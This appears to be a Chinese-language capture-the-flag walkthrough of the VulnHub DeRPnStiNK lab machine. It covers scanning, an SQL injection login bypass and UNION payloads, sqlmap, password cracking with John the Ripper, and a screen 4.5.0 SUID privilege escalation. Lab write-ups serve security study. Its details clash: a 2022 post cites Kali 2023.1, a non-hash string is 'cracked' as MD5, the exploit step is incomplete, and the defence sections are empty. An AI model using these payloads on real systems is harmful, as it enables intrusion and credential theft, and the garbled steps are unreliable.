DeRPnStiNK靶机渗透实例分析

发布时间:2022-01-14 17:15:17 作者:柒染
来源:亿速云 阅读:472
# DeRPnStiNK靶机渗透实例分析

## 摘要
本文以VulnHub平台上的DeRPnStiNK靶机为研究对象,通过完整的渗透测试流程演示了从信息收集到权限提升的实战过程。文章详细剖析了SQL注入漏洞利用、密码破解、SUID提权等关键技术点,并提供了防御建议,旨在帮助安全从业人员理解常见漏洞利用链的构建方式。

---

## 1. 靶机环境介绍
### 1.1 靶机基本信息
- 名称:DeRPnStiNK (v1.0)
- 难度:中级
- 发布日期:2017年
- 操作系统:Ubuntu Linux
- 服务架构:LAMP(Linux+Apache+MySQL+PHP)

### 1.2 环境配置
```bash
攻击机:Kali Linux 2023.1 (IP: 192.168.1.100)
靶机:DeRPnStiNK (IP: 192.168.1.150)
网络模式:NAT

2. 渗透测试流程

2.1 信息收集阶段

2.1.1 主机发现

使用nmap进行存活主机扫描:

nmap -sn 192.168.1.0/24

发现靶机IP为192.168.1.150

2.1.2 端口扫描

全面扫描开放端口和服务:

nmap -sV -p- 192.168.1.150 -T4

扫描结果:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2
80/tcp   open  http    Apache httpd 2.4.18
111/tcp  open  rpcbind 2-4 (RPC #100000)

2.1.3 Web目录枚举

使用dirb进行目录爆破:

dirb http://192.168.1.150 /usr/share/wordlists/dirb/common.txt

发现关键目录:

/webnotes/          # 网络笔记系统
/phpmyadmin/        # MySQL管理界面

2.2 漏洞利用阶段

2.2.1 Web应用测试

访问/webnotes发现登录页面,尝试万能密码失败后测试SQL注入:

  1. 用户名字段注入测试:
admin' or '1'='1' -- 

成功绕过登录进入后台

  1. 使用sqlmap自动化验证:
sqlmap -u "http://192.168.1.150/webnotes/login.php" --data="username=admin&password=123" --risk=3 --level=5

确认存在基于时间的盲注漏洞

2.2.2 数据库信息提取

通过SQL注入获取数据库信息:

UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()

发现关键表:

users, notes, config

提取管理员凭据:

UNION SELECT 1,username,password,4 FROM users

获取到加密密码:

admin:derpderpderpderpderp

2.2.3 密码破解

使用John the Ripper破解密码:

echo "derpderpderpderpderp" > hash.txt
john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

成功破解为:admin:derp123


2.3 权限提升阶段

2.3.1 SSH登录

使用获取的凭据尝试SSH登录:

ssh admin@192.168.1.150

成功获取普通用户权限

2.3.2 本地信息枚举

检查SUID权限文件:

find / -perm -4000 -type f 2>/dev/null

发现异常程序:

/usr/bin/screen-4.5.0

2.3.3 SUID提权

搜索已知漏洞:

searchsploit screen 4.5.0

发现本地提权漏洞(CVE-2017-5618)

执行提权操作:

screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen-4.5.0 -ls

成功获取root权限


3. 漏洞根源分析

3.1 Web应用漏洞链

  1. 输入验证缺失:未对登录参数进行过滤
  2. 密码存储缺陷:使用简单MD5哈希且未加盐
  3. 默认配置风险:phpMyAdmin暴露在公网

3.2 系统配置问题

  1. 过时软件包:screen-4.5.0存在已知漏洞
  2. 权限分配不当:关键程序配置SUID位

4. 防御建议

4.1 开发层面

4.2 系统层面


5. 总结

本案例展示了从Web应用到系统层的完整攻击链,重点揭示了以下安全启示: 1. 边界防御的突破往往始于看似简单的Web漏洞 2. 权限配置不当会显著扩大攻击面 3. 安全是一个整体,需要多层次防护


附录:关键截图

(此处应插入渗透过程关键步骤截图)

参考文献

  1. VulnHub DeRPnStiNK官方说明
  2. OWASP SQL Injection Prevention Cheat Sheet
  3. CVE-2017-5618漏洞公告

”`

注:实际执行时需注意: 1. 所有渗透测试应在授权环境下进行 2. 部分命令需要根据实际环境调整 3. 敏感信息应做脱敏处理

推荐阅读:
  1. Vulhub-EVM1靶机的使用方法
  2. Vulhub-EVM1靶机

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

derpnstink

上一篇:如何解决mysql中共8小时空闲后连接超时的问题

下一篇:springboot整合quartz定时任务框架的方法是什么

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》